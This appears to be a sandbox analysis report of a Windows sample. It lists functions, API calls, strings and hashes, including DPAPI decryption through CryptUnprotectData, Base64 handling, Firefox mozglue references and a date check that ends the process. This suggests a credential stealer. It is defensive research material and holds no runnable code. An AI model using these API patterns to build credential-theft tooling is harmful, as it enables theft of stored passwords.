Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 8267d02cf2140a0f054606f155f6f02ee44ec9880e2c7904f210ca2da8a5e0f8
Instruction ID: 69f9b3bbcf872a99004d44e2165e54bf206d7ef9fe902f6974a9c09993450ebb
Opcode Fuzzy Hash: 8267d02cf2140a0f054606f155f6f02ee44ec9880e2c7904f210ca2da8a5e0f8
Instruction Fuzzy Hash: AE4171F5D0421ADFDB10DF90DD88BFEB7B9BB48304F1042A9E609A6280D7745A84CF96

Function 6C632C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C632C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C632C61

Part of subcall function 6C5E4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5E4E5A
Part of subcall function 6C5E4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5E4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C632C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C632E2D

Part of subcall function 6C5F81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C5F81DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C632E3B
(root), xrefs: 6C63354F
expected a Time entry, xrefs: 6C632E36

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 68f0a91fe51bf028ed8b2ba809f37d579a56c7d43d46c94eff85048f0dfc8d05
Instruction ID: 7a890d077607c0c6e3aa75e75949b44a58db1a987d680a8867055b1381125aa1
Opcode Fuzzy Hash: 68f0a91fe51bf028ed8b2ba809f37d579a56c7d43d46c94eff85048f0dfc8d05
Instruction Fuzzy Hash: 4591A1706087408FC714CF29C48469EF7E1AFCA358F50692DE59A87791DB30D94ACB9B

Function 6C5ED4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

0, xrefs: 6C5ED852
-, xrefs: 6C5ED7DD
, xrefs: 6C5EDA88
1, xrefs: 6C5EDBDD
@, xrefs: 6C5EDAF6
8, xrefs: 6C5EDC08
9, xrefs: 6C5EDE7F
0, xrefs: 6C5EDC7F

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: 29758709fc892649404785818eb6991bc7f102bf33434fad430291efe5e37b61
Instruction ID: b143c5434fdf3b0d3ad472abfb60e84b8f8672a7cec234a0ab15727eb33dc6f4
Opcode Fuzzy Hash: 29758709fc892649404785818eb6991bc7f102bf33434fad430291efe5e37b61
Instruction Fuzzy Hash: 0862DE7150C3558FD701CF29C89076EBBF2AFCA358F184A4EE8E54BA91D3359985CB82

Function 6C65545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C658A4B

Strings

~q^l, xrefs: 6C65921F, 6C659269, 6C655703, 6C659459, 6C655740, 6C6556C7, 6C65948F

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: memset
String ID: ~q^l
API String ID: 2221118986-2678806397
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 6cb610813611d93764ce4d3b4b049c264526217f3432b86240934bcae8eb7642
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: BAB1F772E0421ACFDB14CF68CC907E9B7B2EF85314F6802A9C549DB791D730A996CB94

Function 6C65542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6588F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C65925C

Strings

~q^l, xrefs: 6C65921F, 6C659269, 6C655703, 6C659459, 6C655740, 6C6556C7, 6C65948F

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: memset
String ID: ~q^l
API String ID: 2221118986-2678806397
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 79c69127156989deb5ad88eb2861d4aa7d724b22302e9de10e838ffa45f2948e
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: D6B1D772E0520ACFCB14CF58CC816EDB7B2EF89314F640269C549DBB95D730A99ACB94

Function 00479AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F

Strings

NG, xrefs: 00479AD4, 00479AE1, 00479AF9, 00479B18, 00479AE4, 00479B1B

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: NG
API String ID: 4291131564-1651712548
Opcode ID: 76f8ebf436b228a16595d696de2467162ac68d1a1212a1c20533ab858e029016
Instruction ID: 4926eff5244f52d61585f180d721c3ba143e8e50fe3a641a7a5e34c8d0794340
Opcode Fuzzy Hash: 76f8ebf436b228a16595d696de2467162ac68d1a1212a1c20533ab858e029016
Instruction Fuzzy Hash: 4B11A4B4240308AFEB10CFA4DC95FAA77B5FB89700F208159FA199B390C775A941CB94

Function 00486920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0048696C
sscanf.NTDLL ref: 00486999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004869B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004869C0
ExitProcess.KERNEL32 ref: 004869DA

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: d0acc49ea327c8f3bb93e8f1d72d7c8e07bae1b65edddd9322fba2035d2c5f8a
Instruction ID: eddc1433ef7a3f56e174c34823eb496ab8357cb2a9f1a000371ea277f7076795
Opcode Fuzzy Hash: d0acc49ea327c8f3bb93e8f1d72d7c8e07bae1b65edddd9322fba2035d2c5f8a
Instruction Fuzzy Hash: 7A21EEB5D14208ABCF44EFE4D9459EEB7B6FF48300F04856EE406E3250EB745645CB69

Function 00477240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0047724D
RtlAllocateHeap.NTDLL(00000000), ref: 00477254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00477281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004772A4
LocalFree.KERNEL32(?), ref: 004772AE

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 244b02b720ca9f54d762347ea7d0817bc4501b35f77656e5083415348f325326
Instruction ID: 125770a6a37d659a905d2a8a248da9bf32e15df793873a50f489baa627936847
Opcode Fuzzy Hash: 244b02b720ca9f54d762347ea7d0817bc4501b35f77656e5083415348f325326
Instruction Fuzzy Hash: 6C0112B5A40208BBEB10DFD4CD45F9E7779EB44700F108155FB09AB2C0D674AA418B69

Function 00840438 Relevance: 6.6, Strings: 4, Instructions: 1615COMMON

Download Yara Rule

Strings

{9, xrefs: 0084057B
&R[W, xrefs: 00841494
5&e|, xrefs: 00840A88
|nK, xrefs: 008407FF

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: &R[W$5&e|$|nK${9
API String ID: 0-913892018
Opcode ID: 31f09ca6a87cd95ae20025582afd0b19ea6df050e19f283056a8abef162ec684
Instruction ID: 01b45dfdd83e24ca8308cd54e300b9c297988d30e00af96c9f3c258d1ad7e343
Opcode Fuzzy Hash: 31f09ca6a87cd95ae20025582afd0b19ea6df050e19f283056a8abef162ec684
Instruction Fuzzy Hash: 69B218F3A082009FE704AE2DDC8567AFBE5EFD4720F1A853DEAC483744EA7558058697

Function 0083EA10 Relevance: 6.6, Strings: 4, Instructions: 1601COMMON

Download Yara Rule

Strings

G}7, xrefs: 0083EB5F
`y[c, xrefs: 0083F952
Q'o?, xrefs: 0083FB09
\[v], xrefs: 0083F8D9

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Q'o?$\[v]$`y[c$G}7
API String ID: 0-269902910
Opcode ID: 471dcea246d662092a52610c6c7f803ad132ef46e51c8ceebd504b773829f1bf
Instruction ID: 903593ab0835d6820c90037e3d0bdc93537c5a1fb07c48f5c99215576ea6a18a
Opcode Fuzzy Hash: 471dcea246d662092a52610c6c7f803ad132ef46e51c8ceebd504b773829f1bf
Instruction Fuzzy Hash: 68B2D8F3A0C2009FE704AE2DEC4567ABBE5EF94720F16493DEAC4C3744EA3598158697

Function 00488EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00475184,40000001,00000000,00000000,?,00475184), ref: 00488EC0

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
